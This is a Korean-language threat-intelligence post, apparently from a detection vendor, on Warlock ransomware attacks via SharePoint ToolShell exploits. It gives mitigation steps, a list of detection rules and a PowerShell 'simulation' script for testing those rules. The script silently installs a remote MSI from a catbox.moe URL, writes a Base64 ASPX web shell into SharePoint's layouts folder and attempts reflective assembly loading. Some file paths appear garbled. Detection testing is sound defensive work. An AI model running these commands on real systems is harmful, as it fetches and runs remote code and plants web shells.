SOC Prime Bias: Critical

05 Oct 2026 17:09 UTC

워록 랜섬웨어, 주요 상수도 및 통신 인프라 공격

Author Photo
SOC Prime Team linkedin icon 팔로우
워록 랜섬웨어, 주요 상수도 및 통신 인프라 공격
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

요약

Longlegs로 추적되는 중국 연결 위협 행위자는 Microsoft SharePoint 취약점을 악용하여 Warlock 랜섬웨어를 배포하고 있습니다. 이 그룹은 초기에 침해된 네트워크를 횡단하기 전에 ToolShell 익스플로잇 체인을 사용합니다. 공격자들은 또한 보안 소프트웨어를 비활성화하기 위해 취약한 드라이버를 악용하고 페이로드 전달을 위해 합법적인 클라우드 서비스를 활용하는 등 고급 회피 기술을 적용합니다.

조사

조사는 초기 SharePoint 익스플로잇에서 LAYOUTS 디렉토리 내 웹쉘 배포까지 활동을 추적했습니다. 분석가들은 원격 코드 실행을 위해 위조된 ASP.NET 머신 키가 사용되었으며, 도메인 전체 배포를 위해 SYSVOL 공유에 랜섬웨어가 배치되었음을 관찰했습니다. 공격 체인에는 DLL 사이드로딩과 Visual Studio Code 터널링 기능의 악용도 포함되었습니다.

완화

조직은 알려진 ToolShell 취약점을 해결하기 위해 Microsoft SharePoint Server의 패치를 우선시해야 합니다. 서명되었으나 취약한 드라이버에 대한 엄격한 통제를 시행하면 BYOVD 공격을 방지할 수 있습니다. 보안 팀은 또한 이색적인 생활-오프-더-랜드 도구 사용을 모니터링하고, SYSVOL 공유에 대한 행정적이지 않은 활동 접근을 제한하여 횡단 이동 및 랜섬웨어 배포를 줄여야 합니다.

응답

악성 활동이 감지되면 사건 대응자는 영향을 받은 SharePoint 서버를 격리하고 SYSVOL 공유에서 무단 스크립트나 바이너리를 검사해야 합니다. 지역 관리자 그룹에 대한 무단 추가에 초점을 맞춘 도메인 계정의 포괄적인 감사를 수행하십시오. 페이로드 스테이징에 사용된 catbox.moe 또는 wasabisys.com과 같은 파일 공유 서비스에 대한 네트워크 트래픽을 검토하십시오.

공격 흐름

탐지

로컬 관리자에 사용자 추가 (cmdline을 통해)

SOC Prime 팀
2026년 10월 5일

Powershell을 통한 다운로드 또는 업로드 (cmdline을 통해)

SOC Prime 팀
2026년 10월 5일

의심스러운 Powershell 문자열 (cmdline을 통해)

SOC Prime 팀
2026년 10월 5일

Powershell CommandLine에서 의심스러운 .NET 클래스/메소드 호출 (process_creation을 통해)

SOC Prime 팀
2026년 10월 5일

네트워크 공유 발견 가능성 (cmdline을 통해)

SOC Prime 팀
2026년 10월 5일

의심스러운 도메인 신뢰 발견 (cmdline을 통해)

SOC Prime 팀
2026년 10월 5일

원격 MSI 파일 설치 시도 가능성 (cmdline을 통해)

SOC Prime 팀
2026년 10월 5일

공용 사용자 프로필에서의 의심스러운 실행 (process_creation을 통해)

SOC Prime 팀
2026년 10월 5일

의심스러운 Powershell 문자열 (powershell을 통해)

SOC Prime 팀
2026년 10월 5일

Powershell에서의 의심스러운 .NET 메소드 호출 (powershell을 통해)

SOC Prime 팀
2026년 10월 5일

Microsoft Exchange / Sharepoint 디렉토리에서 웹쉘 생성 가능성 (file_event을 통해)

SOC Prime 팀
2026년 10월 5일

공용 사용자 프로필의 의심스러운 파일 (file_event을 통해)

SOC Prime 팀
2026년 10월 5일

타사 서비스 / 도구를 통한 데이터 유입 / 유출 / C2 가능성 (프록시를 통해)

SOC Prime 팀
2026년 10월 5일

타사 서비스 / 도구를 통한 데이터 유입 / 유출 / C2 가능성 (dns를 통해)

SOC Prime 팀
2026년 10월 5일

Out-of-Band 인터랙션 도메인에 요청하여 의심스러운 명령 및 제어 (dns를 통해)

SOC Prime 팀
2026년 10월 5일

Warlock 랜섬웨어 공격자들이 수자원 및 통신 사업자를 공격한 것을 탐지하기 위한 IOCs (HashSha256)

SOC Prime AI 규칙
2026년 10월 5일

코드 실행을 위한 악성 PowerShell 명령 탐지 [Windows Powershell]

SOC Prime AI 규칙
2026년 10월 5일

Warlock 랜섬웨어 스테이징 및 네트워크 공유를 통한 실행 [Windows 파일 이벤트]

SOC Prime AI 규칙
2026년 10월 5일

SharePoint 서버에서의 Warlock 랜섬웨어 지표 [Windows 프로세스 생성]

SOC Prime AI 규칙
2026년 10월 5일

시뮬레이션 실행

전제 조건: 텔레메트리 및 기준선 사전 체크를 통과해야 합니다.

근거: 이 섹션은 탐지 규칙을 트리거하도록 설계된 적수 기술(TTP)의 정확한 실행을 상세히 설명합니다. 명령과 설명은 반드시 식별된 TTP를 직접 반영하고 탐지 논리에서 예상되는 정확한 텔레메트리를 생성하도록 해야 합니다. 추상적이거나 관련 없는 예는 오진으로 이어질 수 있습니다.

  • 공격 서사 및 명령: 적수는 Warlock 랜섬웨어를 SharePoint 서버에 배포하려고 합니다. 공격은 msiexec 를 사용하여 원격 공격자가 제어하는 도메인에서 악성 MSI를 가져오는 것으로 시작됩니다 (catbox.moe). 초기 기반을 마련한 후 공격자는 PowerShell을 사용하여 SharePoint layout2sp.aspx 경로에 Base64 인코딩된 페이로드를 사용하여 단순 문자열 필터를 우회하고 악성 ASPX 웹 쉘을 기록하려고 합니다. 최종적으로 공격자는 System.Workflow.ComponentModel 를 사용하여 디스크에 파일 흔적을 남기지 않고 코드를 실행하기 위해 메모리 내부에 악성 .NET 어셈블리를 직접 로드하려고 시도합니다.

  • 회귀 테스트 스크립트:

    # Warlock 랜섬웨어 시뮬레이션 스크립트
    # 주의: 이 스크립트는 승인된 테스트 목적 전용입니다.
    
    Write-Host "[!] Warlock 랜섬웨어 시뮬레이션 시작..." -ForegroundColor Red
    
    # 1. MSIEXEC 원격 다운로드 시뮬레이션 (선택 3)
    Write-Host "[*] MSIEXEC 원격 페이로드 다운로드 시뮬레이션 중..."
    Start-Process "msiexec.exe" -ArgumentList "/q /i ""https://litter.catbox.moe/6f5tdt.msi""" -ErrorAction SilentlyContinue
    
    # 2. PowerShell ASPX 웹 쉘 드롭 시뮬레이션 (선택 1)
    # 탐지를 보장하기 위해 규칙에서 정확한 문자열 사용
    Write-Host "[*] Base64를 통해 PowerShell 웹 쉘 드롭 시뮬레이션 중..."
    $cmd1 = "powershell -nop -c ""[IO.File]::WriteAllBytes('CSIDL_PROGRAM_FILES_COMMONmicrosoft sharedweb 서버 extensions14templatelayoutslayout2sp.aspx',[Convert]::FromBase64String('<base64 ASPX payload>'))"""
    Invoke-Expression $cmd1
    
    # 3. 반사 어셈블리 로딩 시뮬레이션 (선택 2)
    Write-Host "[*] 반사 어셈블리 로딩 시뮬레이션 중..."
    $cmd2 = "cmd.exe /c powershell.exe -NoProfile -NonInteractive -[void][Reflection.Assembly]::Load('System.Workflow.ComponentModel"
    Invoke-Expression $cmd2
    
    Write-Host "[+] 시뮬레이션 명령 전송 완료." -ForegroundColor Green
  • 정리 명령:

    # 시뮬레이션 중 생성된 아티팩트를 제거하기 위한 정리 스크립트
    Write-Host "[!] 시뮬레이션 아티팩트 정리 중..." -ForegroundColor Yellow
    
    # 시뮬레이션된 파일 제거 (참고: 실제 테스트에서는 생성된 특정 경로를 대상으로 함)
    # 더미 문자열을 사용했으므로 실제로 악성 파일이 떨어지지 않도록 주로 보장함.
    Remove-Item -Path "C:WindowsTemp*" -Recurse -Force -ErrorAction SilentlyContinue
    
    Write-Host "[+] 정리 완료." -ForegroundColor Green